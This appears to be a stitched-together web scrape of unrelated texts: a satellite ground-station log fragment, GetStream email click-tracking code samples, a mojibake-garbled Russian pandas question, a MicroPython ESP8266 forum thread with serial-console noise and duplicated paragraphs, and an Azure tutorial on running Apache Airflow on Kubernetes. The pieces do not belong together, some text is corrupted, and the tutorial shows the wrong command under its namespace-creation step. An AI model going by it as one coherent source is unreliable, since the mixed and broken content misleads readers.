10 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
11 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
12 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
13 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [36m[Info] In SendLoop mode - a telecommand in every .[0m
Session downlink frames count: 169
Session downlink duration [s]: 36.59
Session uplink frames count: 13
Session uplink duration [s]: 18.72
Session power budget energy [mWh]: 30.5
Session power budget mean power [mW]: N/A
================ Resources utilization for SCHEDULED experiments or tasks ================
[Info] No scheduled experiments or tasks.
Artifacts
waterfalls
files
telemetry.previous
elka_versions
downlink_frames.txt
telemetry.current
beacons.txt
requested_files.txt
file_list_2.txt
elka_downlink.frames
fp-gs_downlink.frames
all.frames
fp-gs_versions
|
Users tend to engage with emails even when they aren't engaged with your app. Thus, it's important to track how they interact with your emails.
Tracking clicks in emails works via redirects. You can use our client libraries to generate a redirect link.
Example
// the url to redirect to
const target_url = 'http://mysite.com/detail';
// track the impressions and a click
const impression = {
content_list: ['tweet:1', 'tweet:2', 'tweet:3'],
user_data: 'tommaso',
location: 'email',
feed_id: 'user:global'
};
const engagement = {
content: 'tweet:2',
label: 'click',
position: 1,
user_data: 'tommaso',
location: 'email',
feed_id: 'user:global'
};
const events = [impression, engagement];
const tracking_url = client.client.createRedirectUrl(target_url, "tommaso", events);
// when the user opens the tracking url in their browser gets redirected to the target url the events are added to our analytics platform
# the url to redirect to
target_url = 'http://mysite.com/detail'
# track the impressions and a click
impression = {
'content_list': ['tweet:1', 'tweet:2', 'tweet:3'],
'user_data': 'tommaso',
'location': 'email',
'feed_id': 'user:global'
}
engagement = {
'content': 'tweet:2',
'label': 'click',
'position': 1,
'user_data': 'tommaso',
'location': 'email',
'feed_id':
'user:global'
}
events = [impression, engagement]
tracking_url = client.create_redirect_url(target_url, user_id, events)
# when the user opens the tracking url in their browser gets redirected to the target url
# the events are added to our analytics platform
$client = new GetStream\Stream\Client('', 'YOUR_API_SECRET');
// the url to redirect to
$targetUrl = 'http://my.application.com/page/';
$impression = [
'content_list' => ['tweet:34349698', 'tweet:34349699', 'tweet:34349697'],
'feed_id' => 'flat:tommaso',
'location' => 'profile_page',
'user_data' => ['id' => 'bubbles'],
'label' => 'impression',
];
$engagement = [
'content' => 'tweet:34349698',
'feed_id' => 'flat:tommaso',
'location' => 'profile_page',
'user_data' => ['id' => 'frank'],
'label' => 'click',
];
$events = [$impression, $engagement];
$trackingUrl = $client->createRedirectUrl($targetUrl, $events);
// when the user opens the tracking url in their browser gets redirected to the target url
// the events are added to our analytics platform
// the URL to direct to
URL targetURL = new URL("http://mysite.com/detail");
// track the impressions and a click
List<impression> impressions = Lists.newArrayList(Impression.builder()
.contentList(new Content("tweet:1"),
new Content("tweet:2"),
new Content("tweet:3"))
.userData(new UserData("tommaso", null))
.location("email")
.feedID("user:global")
.build());
List<engagement> engagements = Lists.newArrayList(Engagement.builder()
.content(new Content("tweet:2"))
.label("click")
.position(1)
.userData(new UserData("tommaso", null))
.location("email")
.feedID("user:global")
.build());
// when the user opens the tracking URL in their browser gets redirected to the target URL
// the events are added to our analytics platform
URL trackingURL = client.analytics().createRedirectURL(targetURL, impressions, engagements);</engagement></impression>
// the URL to direct to
targetURL := "http://mysite.com/detail"
// track the impressions and a click
impression := ImpressionEventsData{}.
WithForeignIDs("tweet:1", "tweet:2", "tweet:3").
WithUserData(NewUserData().String("tommaso")).
WithLocation("email").
WithFeedID("user:global")
engagement := EngagementEvent{}.
WithForeignID("tweet:2").
WithLabel("click").
WithPosition(1).
WithUserData(NewUserData().String("tommaso")).
WithLocation("email").
WithFeedID("user:global")
trackingURL, err := client.Analytics().RedirectAndTrack(targetURL, impression, engagement)
if err != nil {
panic(err)
}
// when the user opens the tracking URL in their browser gets redirected to the target URL
// the events are added to our analytics platform
In the code above, when a user clicks the tracking URL, they are re-directed to the specified target URL. During the re-direct, Stream tracks the impressions and engagement events you specified.
|
ÐÑивеÑ, еÑÑÑ ÐºÐ¾Ð´:
kucoin = requests.get('https://api.kucoin.com/v1/open/tick')
kuc = pd.DataFrame(kucoin.json()['data']).sort_values(['symbol'])
b = kuc.loc[kuc['symbol'].isin(pairskucbtc), ['sell']].to_string(index=False, header=None)
ÐаннÑе вÑдаÑÑÑÑ Ð² str ÑоÑмаÑе, нÑжен float Ð´Ð»Ñ Ð°ÑиÑмеÑиÑеÑÐºÐ¸Ñ ÑаÑÑеÑов. Ðак конвеÑÑиÑоваÑÑ? Я пÑобовал добавлÑÑÑ
pd.options.display.float_format = '{:,.8f}'.format
или
to_string(index=False, header=None, float.format=True)
Ðо Ñип даннÑÑ Ð²Ñе Ñавно оÑÑаеÑÑÑ str. ÐÑвод даннÑÑ :
0.02340240.02342410.2523452..
много ÑÑÑок. ÐÐ¾Ñ Ð²Ñе ÑÑÑоки мне нÑжно ÑделаÑÑ ÑиÑлами. ÐÑвод даннÑÑ Ð±ÐµÐ· to_string():
sell189 0.00029322197 0.00005053136 0.11209140258 0.00008497
С индекÑом и заголовком, коÑоÑÑе мне не нÑжнÑ.
|
I've seen appropriate commits on github, last one yesterday. : https://github.com/micropython/micropyt ... its/masterkobertkirk wrote:When can we expect floating point operations to be added?
Didn't run any tests though. Still fiddling with the toolchain.
Guys, I'd like to remind that the official release is in 2 months, so that's the best answer to questions "when feature X will be available" (of core features, stretch-goal features will take more time after that).
With that reminded, we started to spool source code to the master branch - while, as KS updates says, taking a chance to refactor and clean up it. To give you an idea, UART REPL handling went thru 3 incarnations. The original socket module is one I quickly put up 1 year ago (sic!) to test my idea of how to have BSD-compatible sockets on top of lwIP (without bringing in a full-fledged RTOS). I then spent quite a time discussing this idea with other ESP8266 hackers inviting them to see where my reasoning is wrong and why it can't work, but nobody was interested. I'm grateful to
Another point - new ESP8266 port depends on other components, first of all esp-open-sdk. There're bunch of changes to do to it too to make port easily buildable (while we just did multi-step manual setup, which for sure will be error-prone to many people). I've just added https://github.com/pfalcon/esp-open-lwip as a submodule to esp-open-sdk, yet need to integrate it completely into build process. And over last month, there was already bunch of changes to it, so if you didn't rebuild for awhile, I suggest you rebuild it from scratch (make clean; make). Then be ready to rebuild it again as it progresses.
But again, source is getting there. If you posses required skills, we welcome you to build, run, test it. Automated testsuite support is one of the biggest change the project brings - now we know that there're not just features, but that they actually work (or will work soon; or eventually). Floating points support works great for us, with small caveat - there's slightly less precision than on PyBoard, to accommodate less memory and lack of HW FP on ESP8266. Try it
With that reminded, we started to spool source code to the master branch - while, as KS updates says, taking a chance to refactor and clean up it. To give you an idea, UART REPL handling went thru 3 incarnations. The original socket module is one I quickly put up 1 year ago (sic!) to test my idea of how to have BSD-compatible sockets on top of lwIP (without bringing in a full-fledged RTOS). I then spent quite a time discussing this idea with other ESP8266 hackers inviting them to see where my reasoning is wrong and why it can't work, but nobody was interested. I'm grateful to
GalenHZwho accepted the challenge and developed fully independent implementation based on these ideas, to prove its viability. Well, we started with my module still as known-working, and then gradually switched to GalenHZ's modlwip, discovered and fixed bunch of issues with it and added more features (few fixes are already in the mainline, as it's a chore to keep them in a separate branch). Do we need 3 REPLs and 2 socket modules? Apparently no. When someone submits questionable code, I'm the first to suggest: "This code looks like one we can add, and then soon remove again, then why, please do it right". Then the only choice is to apply the same treatment to our own code, and uphold the high testimonies MicroPython already received for its code quality.
Another point - new ESP8266 port depends on other components, first of all esp-open-sdk. There're bunch of changes to do to it too to make port easily buildable (while we just did multi-step manual setup, which for sure will be error-prone to many people). I've just added https://github.com/pfalcon/esp-open-lwip as a submodule to esp-open-sdk, yet need to integrate it completely into build process. And over last month, there was already bunch of changes to it, so if you didn't rebuild for awhile, I suggest you rebuild it from scratch (make clean; make). Then be ready to rebuild it again as it progresses.
But again, source is getting there. If you posses required skills, we welcome you to build, run, test it. Automated testsuite support is one of the biggest change the project brings - now we know that there're not just features, but that they actually work (or will work soon; or eventually). Floating points support works great for us, with small caveat - there's slightly less precision than on PyBoard, to accommodate less memory and lack of HW FP on ESP8266. Try it
out of curiosity, did you use OSX or Linux to build the stuff? I tried yesterday with OSX but I struggled compiling the toolchain and I gave up.mad474 wrote:Done! Runningpfalcon wrote:Try it
MicroPython v1.6-136-g98b727c on 2016-03-05; ESP module with ESP8266
on an "old"ESP8266 ESP-01.
https://youtu.be/tlZ4FiQR5U0
You guys really rock!Thanks!
Code: Select all
MicroPython v1.6-128-g5788499 on 2016-03-05; ESP module with ESP8266
Type "help()" for more information.
>>> 2+4
6
>>> help()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>> import pyb
>>> pyb
<module 'pyb'>
>>> dir(pyb)
['__name__', 'info', 'freq', 'millis', 'elapsed_millis', 'micros', 'elapsed_micros', 'delay', 'udelay', 'sync', 'hard_reset', 'Pin', 'ADC', 'RTC']
>>> help(pyb)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>>
Downloaded on linux and compile without problems.
Yes Frida is my watchdog!
I have the same problem as frida. Downloaded the pre-compiled firmware from Adafruit and flashed it onto ESP-01. NameError as above, for any command.Frida wrote:First download on a esp8266-01 today.
Code: Select all
MicroPython v1.6-128-g5788499 on 2016-03-05; ESP module with ESP8266
Type "help()" for more information.
>>> help()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>>
Downloaded on linux and compile without problems.
@electronicsguy
I'm using the one from github, and not that one from Adafruit.
If you look, it can 2+4=6, it was only the help that is not working yet.
Wait till they are ready to release the first version to the public, or try to compile it for you selv.
I'm using the one from github, and not that one from Adafruit.
If you look, it can 2+4=6, it was only the help that is not working yet.
Wait till they are ready to release the first version to the public, or try to compile it for you selv.
Yes Frida is my watchdog!
So the Alpha4 has been released, thanks!
Unfortunately, on my machine webrepl doesn't seem to work (whereas V3 did). I erased flash before updating, just to make sure but with the same results. I'm on Adafruit's Huzzah Board.
Here is the traceback from a example session:
ideas?
Unfortunately, on my machine webrepl doesn't seem to work (whereas V3 did). I erased flash before updating, just to make sure but with the same results. I'm on Adafruit's Huzzah Board.
Here is the traceback from a example session:
Code: Select all
>>> import webrepl as w
>>> w.start()
WebREPL daemon started on 192.168.4.1:8266
>>> # I refresh the browser window here
WebREPL connection from: ('192.168.4.2', 52279)
NLR jump failed
ets Jan 8 2013,rst cause:2, boot mode:(3,0)
load 0x40100000, len 30596, room 16
tail 4
chksum 0x8b
load 0x3ffe8000, len 980, room 4
tail 0
chksum 0x5f
load 0x3ffe83e0, len 2652, room 8
tail 4
chksum 0x9c
csum 0x9c
␎␌␌l��|��␒rrnb��␌l��␂␌b�l␌b쌜���l�r�␌b␌�lrldon't use rtc mem data
␎l␌l��|��␒rrnb��ll��␌�b�␌b쌜��␂␂�␂␌b�␌�lrl␎�␌l��|��␒rrnb��l␌���pp␌�␌␌b쌜��␂�␌�␌b�lb␎lrl��rl���b␌l�br|�␌b␌ll␌��␜�lb��n�␒nn�␐␂␌␂�l�|␂�l␌�␌l��l�␞���␞��l`␂�␂n�␀���b␌␌�␌�b␌␂␂���b␌l�b�␎lrlr�n��␀�␌��n����␂bp␂b�����␌�␞␐b���|�␌��lrl␂��␂ln�prl␎�␌l��could not open file 'boot.py' for reading
could not open file 'main.py' for reading
#4 ets_task(401002a8, 3, 3fff5148, 4)
MicroPython v1.7-205-gb69d1fc on 2016-04-22; ESP module with ESP8266
Type "help()" for more information.
|
Key Takeaways
Selecting the right data orchestration tool is important due to differences and trade-offs between the variety of options for building distributed data pipelines.
Apache Airflow is one of the most popular and widely adopted OSS projects for programmatic orchestration of data workflows
Main Airflow concepts include Directed Acyclic Graph, scheduler, webserver, executor, and metadata database
You can provision a distributed Airflow setup in a cloud-agnostic environment, as well as in the cloud on Azure, AWS, and GCP.
Data pipelines, movement, workflows, transformation, and ETL have always been important for a broad range of businesses. Data pipeline tools can be grouped into several categories:
Simple utilities, such as cron, excellent for trivial data pipelines.
Platform-specific tools, or cloud-based managed services, such as AWS Glue or Data Pipeline, or Azure Data Factory, providing tight integration with specific products, moving data between them.
Open-source projects, such as Apache Airflow, Apache Oozie or Azkaban, Dagster, Prefect, offering flexibility, extensibility, and rich programmable control flow.
What is covered in this article
In this article, I am focusing on Apache Airflow as one of the most flexible, extensible, and popular in the community projects for reliable and scalable data and AI pipelines. I will cover:
Key Apache Airflow concepts and why use it in distributed setting
General architecture for Apache Airflow environment in the cloud
Detailed guide for provisioning Apache Airflow on Kubernetes on Azure
Apache Airflow: Key Concepts
Airflow is based on the following concepts and components:
DAG (Directed Acyclic Graph)- a set of tasks and dependencies between them, defined using Python code.
Scheduler- discovers the DAGs that are ready to be triggered according to the associated schedule. When the scheduler discovers task failures, it can optionally retry the DAG a certain number of times.
Webserver- a handy UI interface for viewing, scheduling, or triggering DAGs, offering useful information on task success or failure status, progress, duration, retries, logs, and more.
Executor- component that runs a task, assigns it to a specific node, and updates other components of its progress.
Metadata database- where Airflow can store metadata, configuration, and information on task progress.
Scalable data workflows with Airflow on Kubernetes
Airflow can be run on a single-machine or in a distributed mode, to keep up with the scale of data pipelines.
Airflow can be distributed with Celery - a component that uses task queues as a mechanism to distribute work across machines. There is a requirement to have a number of nodes running up front to schedule tasks across them. Celery is deployed as an extra component in your system and requires a message transport to send and receive messages, such as Redis or RabbitMQ.
Airflow supports Kubernetes as a distributed executor. it doesn’t require any additional components, like Redis. Kubernetes executor doesn’t need to always keep a certain number of workers alive as it creates a new pod for every job.
General architecture of Apache Airflow environment in the cloud
Figure 1. Cloud-agnostic architecture.
Figure 2. Azure architecture.
Figure 3. GCP and AWS architectures.
Provisioning Apache Airflow on Kubernetes in the cloud
To get started, you will need access to a cloud subscription, such as Azure, AWS, or Google Cloud. The example in this article is based on Azure, however, you should be able to successfully follow the same steps for AWS or GCP with minor changes.
To follow the example on Azure, feel free to create an account, and install Azure CLI or use Azure Portal to create necessary resources. If using Azure CLI, don’t forget to login and initialize your session with subscription ID:
az login
az account set --subscription <subscription-id>
To make sure you can easily delete all the resources at once after giving it a try, create an Azure Resource Group that will serve as a grouping unit:
RESOURCE_GROUP_NAME="airflow" REGION="East US" az group create --name $RESOURCE_GROUP_NAME --region $REGION
After you are done with resources, feel free to delete the entire resource group:
az group delete --name $RESOURCE_GROUP_NAME
PostgreSQL
For Apache Airflow, a database is required to store metadata information about the status of tasks. Airflow is built to work with a metadata database through SQLAlchemy abstraction layer. SQLAlchemy is a Python SQL toolkit and Object Relational Mapper. Any database that supports SQLAlchemy should work with Airflow. MySQL or PostgreSQL are some of the most common choices.
To create and successfully connect to an instance of PostgreSQL on Azure, please follow detailed instructions here.
Feel free to use the same resource group name and location for the PostgreSQL instance. Make sure to indicate a unique server name. I chose GP_Gen5_2 as instance size, as 2 vCores and 100 GB of storage is more than enough for the example, but feel free to pick the size that fits your own requirements.
It is important to remember what your PostgreSQL server name, fully qualified domain name, username, and password are. This information will be required during the next steps. Note: you can get a fully qualified domain name by looking at the fullyQualifiedDomainName after executing the command:
POSTGRESQL_SERVER_NAME="<your-server-name>"
az postgres server show --resource-group $RESOURCE_GROUP_NAME --name $POSTGRESQL_SERVER_NAME
# example value of fullyQualifiedDomainName on Azure: airflowazuredb.postgres.database.azure.com
Check connection to your database using PSQL:
P_USER_NAME="your-postgres-username"
psql --host=$POSTGRESQL_SERVER_NAME.postgres.database.azure.com --port=5432 --username=$P_USER_NAME@$POSTGRESQL_SERVER_NAME --dbname=postgres
File Share
When running data management workflows, we need to store Apache Airflow Directed Acyclic Graph (DAG) definitions somewhere. When running Apache Airflow locally, we can store them in a local filesystem directory and point to it through the configuration file. When running Airflow in a Docker container (either locally or in the cloud), we have several options.
Storing data pipeline DAGs directly within the container image. The downside of this approach is when there is a possibility and likelihood of frequent changes to DAGs. This would imply the necessity to rebuild the image each time your DAGs change.
Storing DAG definitions in a remote Git repository. When there are changes within DAG definitions, using Git-Sync sidecar can automatically synchronize the repository with the volume in your container.
Storing DAGs in a shared remote location, such as remote filesystem. Same as with a remote Git repository, we can mount a remote filesystem to a volume in our container and mirror DAG changes automatically. Kubernetes supports a variety of CSI drivers for many remote filesystems, including Azure Files, AWS Elastic File System, or Google Cloud Filestore. This approach is great if you also want to store logs somewhere in a remote location.
I am using Azure Files for storing DAG definitions. To create an Azure fileshare, execute the following commands:
STORAGE_ACCOUNT="storage-account-name"
FILESHARE_NAME="fileshare-name"
az storage account create \
--resource-group $RESOURCE_GROUP_NAME \
--name $STORAGE_ACCOUNT \
--kind StorageV2 \
--sku Standard_ZRS \
--output none
STORAGE_ACCOUNT_KEY=$(az storage account keys list \
--resource-group $RESOURCE_GROUP_NAME \
--account-name $STORAGE_ACCOUNT \
--query "[0].value" | tr -d '"')
az storage share create \
--account-name $STORAGE_ACCOUNT \
--account-key $STORAGE_ACCOUNT_KEY \
--name $FILESHARE_NAME \
--quota 1024 \
--output none
For Azure Files, detailed creation instructions are located here. Feel free to create a fileshare on any of the other platforms to follow along.
After the fileshare is created, you can copy one or several DAGs you might have to your newly created storage. If you don’t have any DAGs yet, you can use one of those available online. For example, the following DAG from one of the GitHub repositories called airflow_tutorial_v01, which you can also find here.
To copy files to Azure Files share, you can use Azure Portal, or AzCopy util for programmatic operations.
Kubernetes cluster
For Apache Airflow scheduler, UI, and executor workers, we need to create a cluster. For Azure Kubernetes Service, detailed cluster creation instructions are here. Make sure to indicate that you’d like the cluster to be provisioned in a Virtual Network (default installation doesn’t include it). I created the cluster with Azure Portal with 3 nodes of size Standard DS2 v2 in East US, with RBAC enabled, and the following network configuration:
Figure 4. Kubernetes Cluster Network Configuration.
Azure Portal has an amazing feature to help you connect to your cluster. On the AKS cluster resource, click Connect at the top, and follow the instructions.
Allow cluster to access database
To make sure the AKS cluster can communicate with the PostgreSQL on Azure database, we need to add a service endpoint on the AKS Virtual Network side and a Virtual Network rule on the PostgreSQL side.
Go to the AKS virtual network resource in Azure Portal, it’s located in the same resource group where the cluster is. Under Service Endpoints settings menu, select Add, and choose Microsoft.SQL from the dropdown:
Figure 5. Add a Service Endpoint to the Virtual Network.
Go to the PostgreSQL on Azure resource, and under Connection Security settings menu VNET rules section, select Add existing virtual network. Specify a name for the Virtual Network rule, select your subscription and the AKS Virtual Network. These actions will make sure Apache Airflow pods on AKS are able to communicate with the database successfully.
Figure 6. Add a Virtual Network Rule.
Prepare fileshare to be used within Kuberneres
Install a CSI driver corresponding to your platform. For Azure, follow instructions to install Azure Files CSI driver.
Create a secret to store Azure storage account name and key (make sure STORAGE_ACCOUNT and STORAGE_ACCOUNT_KEY contain your own values for storage account name and key). This secret will be used later in Persistent Volumes definitions for DAGs and logs.
kubectl create secret generic azure-secret --from-literal accountname=$STORAGE_ACCOUNT --from-literal accountkey=$STORAGE_ACCOUNT_KEY --type=Opaque
Prepare resource files to run Airflow components on Kubernetes
Figure 7. List of Resource Definition Files.
You can clone the GitHub repository to get these files. Before you apply them to your own clusters, make sure to review them and read through the notes in this article, as there are quite a few values that might need to be customized.
Note: I initially got the files from the official Airflow GitHub repository here. I ran the helm template command to generate YAML files and deleted those that weren’t relevant for this use case. My GitHub repository now contains all the necessary files adjusted for this scenario, so you can skip the helm template step if you’d like to use & modify files under my repository.
Namespace
Having a namespace is a good way to identify resources that belong to the same logical group. In this case, we can create a namespace to assign to all resources relevant for our Apache Airflow setup. This is especially convenient for distinguishing groups of resources when there are multiple components living within the same cluster.
Definition of the namespace for all Airflow resources is in the airflow-namespace.yaml file on GitHub.
Create the namespace:
kubectl create secret generic azure-secret --from-literal accountname=$STORAGE_ACCOUNT --from-literal accountkey=$STORAGE_ACCOUNT_KEY --type=Opaque
Make sure to remember to use the right namespace name when creating other resources for Airflow. We will be using airflow-on-k8s in this guide.
Persistent Volumes for logs and DAGs
As one of the ways to work with storage within the cluster, there is a resource called Persistent Volumes. Its goal is to abstract away the details of the underlying storage provider it corresponds to, be it a shared network file system, external volume, or other cloud-specific storage type. Persistent Volume resource is configured with connection information or settings that would define how the cluster will connect to and work with the storage. Persistent Volume lifecycle is independent, and doesn’t have to be attached to the lifecycle of a pod that uses it.
In this case, we need an abstraction to represent storage for DAG definitions and for log files. Definition of a Persistent Volume resource for DAGs is in pv-azurefile-csi.yaml file on GitHub. Definition of a Persistent Volume resource for logs is in pv-azurefile-csi-logs.yaml file on GitHub.
Open pv-azurefile-csi.yaml and pv-azurefile-csi-logs.yaml files to edit them to include your own fileshare name and storage account name. If you followed the steps above, assign the parameter shareName to the value of $FILESHARE_NAME variable, and parameter server to the value of $STORAGE_ACCOUNT.file.core.windows.net.
If you are not using Azure, make sure to change the CSI driver settings to correspond to AWS, GCP, or any other platform. Don’t forget to create any necessary secrets to store sensitive data corresponding to the fileshare system you are using.
Create persistent volumes:
kubectl create -f pv/pv-azurefile-csi.yaml
kubectl create -f pv/pv-azurefile-csi-logs.yaml
Persistent Volume Claims for logs and DAGs
In addition to Persistent Volumes as a storage abstraction, we also have an abstraction that represents a request for storage, called Persistent Volume Claim. The goal of Persistent Volume Claim is to represent a specific pod’s request for storage combined with specific details, such as exact amount of storage, and access mode.
We need to create Persistent Volume Claims for DAGs and logs, to make sure pods that interact with storage can use these claims to request access to the storage (Azure Files in this case).
Definition of a Persistent Volume Claim resource for DAGs is in pvc-azurefile-csi-static.yaml file on GitHub. Definition of a Persistent Volume Claim resource for logs is in pvc-azurefile-csi-static-logs.yaml file on GitHub.
Create persistent volume claims:
kubectl create -f pv/pvc-azurefile-csi-static.yaml
kubectl create -f pv/pvc-azurefile-csi-static-logs.yaml
After a few minutes, make sure your Persistent Volume Claims are in Bound state:
$ kubectl get pvc -n airflow-on-k8s
NAME STATUS VOLUME CAPACITY ACCESS MODES
dags-pvc Bound dags-pv 10Gi RWX
logs-pvc Bound logs-pv 10Gi RWX
Service Accounts for scheduler and workers
To allow certain processes perform certain tasks, there is a notion of Service Accounts. For example, we’d like to make sure Airflow scheduler is able to programmatically create, view, and manage pod resources for workers. To ensure this is possible, we need to create a Service Account for each component we want to grant certain privileges to. Later, we can associate the Service Accounts with Cluster Roles by using Cluster Rolebindings.
Create the service accounts:
kubectl create -f scheduler/scheduler-serviceaccount.yaml
kubectl create -f workers/worker-serviceaccount.yaml
Cluster Role for scheduler and workers to dynamically operate pods
A Cluster Role represents a set of rules or permissions.
Definition of the Cluster Role we want to create is in the pod-launcher-role.yaml file on GitHub.
Create the cluster role:
kubectl create -f rbac/pod-launcher-role.yaml
Cluster Role Binding for scheduler and workers
A Cluster Rolebinding is a connection between a Cluster Role and accounts that need it.
Definition of the Cluster Role is in the pod-launcher-rolebinding.yaml file on GitHub.
Create the cluster role binding:
kubectl create -f rbac/pod-launcher-rolebinding.yaml
Secrets
Secrets is a mechanism for managing sensitive data, such as tokens, passwords, or keys that other resources in the cluster may require.
Note: if you configure the secret through a manifest (JSON or YAML) file which has the secret data encoded as base64, sharing this file or checking it into a source repository means the secret is compromised. Base64 encoding is not an encryption method and is considered the same as plain text.
Apache Airflow needs to know what is the fernet key and how to connect to the metadata database. We will use secrets to represent this information.
Fernet key
Apache Airflow requires fernet key to make sure it can secure connection information that isn’t protected by default.
Start Python shell:
$ python
Python 3.7.5 (default, Nov 1 2019, 02:16:32)
[Clang 11.0.0 (clang-1100.0.33.8)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>>
Generate fernet key from Python shell:
from cryptography.fernet import Fernet
fernet_key= Fernet.generate_key()
print('Generated fernet key: ', fernet_key.decode())
Example output of this command is:
Generated fernet key: ESqYUmi27Udn6wxY83KoM9kuvt9rDcelghHbAgGZW9g=
Convert the value to the base64 encoded value:
$ echo -n "<your-generated-fernet-key-value>" | base64
Example output (it will be the value we will use for fernet-key within fernet-secret.yaml file in this example):
Slk0OThJbHE4R0xRNEFuRlJWT3FUR3lBeDg3bG5BWWhEdWx1ekhHX2RJQT0=
Definition of Fernet Key secret is in the fernet-secret.yaml file on GitHub.
Replace the value of the fernet-key parameter in the file with your generated fernet-key value.
Create the fernet secret:
kubectl create -f secrets/fernet-secret.yaml
Database connection information
Prepare your PostgreSQL database connection. Generally, it follows the format of:
postgresql+psycopg2://user:password@hostname:5432/dbname
Note: when using Azure SQL Database for PostgreSQL, the connection string requires user to be in format of user@host, where @ sign should be escaped as %40 (more details):
postgresql+psycopg2://user%40host:password@host.postgres.database.azure.com:5432/dbname
Encode your connection using base64 (replace airflowusername with your username, airflowpassword with your password, airflowhost with your host, and airflow with your database name):
# For general PostgreSQL
echo -n "postgresql+psycopg2://airflowuser:airlowpassword@airflowhost.postgres.database.azure.com:5432/airflow" | base64
# For Azure PostgreSQL
echo -n "postgresql+psycopg2://airflowuser%40airflowhost:airlowpassword@airflowhost.postgres.database.azure.com:5432/airflow" | base64
Example output (this will be the value we will use for connection within metadata-connection-secret.yaml file in this example):
cG9zdGdyZXNxbCtwc3ljb3BnMjovL2xlbmElNDBhaXJmbG93YXp1cmVkYjpQYXNzd29yZDEhQGFpcmZsb3dhenVyZWRiLnBvc3RncmVzLmRhdGFiYXNlLmF6dXJlLmNvbTo1NDMyL3Bvc3RncmVz
Definition of the connection secret is in the metadata-connection-secret.yaml file on GitHub.
Replace the value of the connection parameter in the file with your base64-encoded connection value.
Create the Airflow connection metadata secret:
kubectl create -f secrets/metadata-connection-secret.yaml
Config Map
A Config Map is a resource that allows storing non-sensitive data in a key-value format. This is convenient for any type of configuration settings. Since Apache Airflow generally requires a configuration file called airflow.cfg, we can use a Config Map to populate it with important parameters. For example:
* dags_folder points to the folder within a pod that can be used to DAGs mounted from remote storage.
* dags_in_image setting can be True or False. If False it will look at mounted volumes or git repository to find DAGs.
* dags_volume_claim is the name of the Persistent Volume Claim for DAGs.
* Settings that start with git_ are relevant if you’re planning to use Git repository to sync DAGs.
* worker_service_account_name can be used to set the name of the worker service account, and so on.
Definition of Config Map is in the configmap.yaml file on GitHub.
Note: there are quite many key-value pairs that can be adjusted in the Config Map, so if you’re doing a lot of experimentation, feel free to tweak some of them. However, also be sure to appropriately modify the necessary resource files as well, as many of the values in the Config Map will affect other resources.
Create config map:
kubectl create -f configmap.yaml
StatsD
StatsD is a process that listens for various statistics, such as counters and timers. Apache Airflow has built-in support for StatsD and is using its Python client to expose metrics. StatsD received information about the number of job successes or failures, number of jobs that are in line waiting for execution, and similar coming from Airflow. If you’re interested in specific types of metrics, take a look at this page.
Create StatsD resources:
kubectl create -f statsd/statsd-deployment.yaml
kubectl create -f statsd/statsd-service.yaml
Check the status of the StatsD instance and get its TCP port:
kubectl get services -n airflow-on-k8s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
statsd ClusterIP 10.0.9.199 <none> 9125/UDP,9102/TCP 24h
Map the StatsD instance to local port (for example 7000):
kubectl port-forward service/statsd 7000:9102 -n airflow-on-k8s
Output:
Forwarding from 127.0.0.1:7000 -> 9102
Forwarding from [::1]:7000 -> 9102
Open the 127.0.0.1:7000 page in your browser to see StatsD main page or metrics page:
Figure 8. StatsD metrics page
Scheduler
Scheduler is one of the main components behind Apache Airflow.
From documentation: > The Airflow scheduler monitors all tasks and all DAGs and triggers the Task instances whose dependencies have been met. Behind the scenes, it spins up a subprocess, which monitors and stays in sync with a folder for all DAG objects it may contain, and periodically (every minute or so) collects DAG parsing results and inspects active tasks to see whether they can be triggered.
Definition of the Scheduler deployment is in scheduler-deployment.yaml file on GitHub.
Create scheduler deployment:
kubectl create -f scheduler/scheduler-deployment.yaml
Webserver
Webserver and UI component of Apache Airflow enables us to kickstart, schedule, monitor, and troubleshoot our data pipelines, as well as many other convenient functions.
If you’d like the Webserver to have an external IP, replace ClusterIP with LoadBalancer in the webserver-service.yaml, and you will be able to access from the outside of the cluster without proxies or port forwarding.
Create webserver deployment and service:
kubectl create -f webserver/webserver-deployment.yaml
kubectl create -f webserver/webserver-service.yaml
Check the status of the Airflow UI instance and get its TCP port:
kubectl get services -n airflow-on-k8s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
statsd ClusterIP 10.0.9.199 <none> 9125/UDP,9102/TCP 24h
webserver ClusterIP 10.0.9.175 <none> 8080:31003/TCP 19h
Map the Airflow UI instance to local port (for example 8080):
kubectl port-forward service/webserver 8080:8080 -n airflow-on-k8s
Output:
Forwarding from 127.0.0.1:8080 -> 8080
Forwarding from [::1]:8080 -> 8080
Open the 127.0.0.1:8080 page in your browser to see the Airflow UI page.
If you’d like to create a new user for Airflow Webserver, you can connect to the webserver pod:
$ kubectl exec --stdin --tty webserver-647fdcb7c-4qkx9 -n airflow-on-k8s -- /bin/bash
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow$
And create a user from Airflow CLI. Replace USERNAME, PASSWORD, FIRSTNAME, LASTNAME, EMAIL, ROLE with your own values. Note: existing Airflow roles can be one of the following - Admin, User, Op, Viewer, and Public:
airflow create_user -u USERNAME -p PASSWORD -f FIRSTNAME -l LASTNAME -e EMAIL -r ROLE
Example output:
[2020-08-08 00:00:40,140] {__init__.py:51} INFO - Using executor KubernetesExecutor
[2020-08-08 00:00:40,143] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
[2020-08-08 00:00:41,834] {security.py:475} INFO - Start syncing user roles.
[2020-08-08 00:00:42,458] {security.py:385} INFO - Fetching a set of all permission, view_menu from FAB meta-table
[2020-08-08 00:00:42,833] {security.py:328} INFO - Cleaning faulty perms
Viewer user newuser created.
Afterward, you can log in to Airflow UI with credentials of any of the users you have provisioned. You should see a page displaying Airflow DAGs:
Figure 9. Airflow UI showing DAGs
You can further explore the Graph View, Tree View, logs, and other details of any particular DAGs if you click on it.
Figure 10. Airflow UI - Logs
Checking health of resources provisioned
Check if scheduler, webserver, and statsd deployments are in a healthy state:
$ kubectl get deployments -n airflow-on-k8s
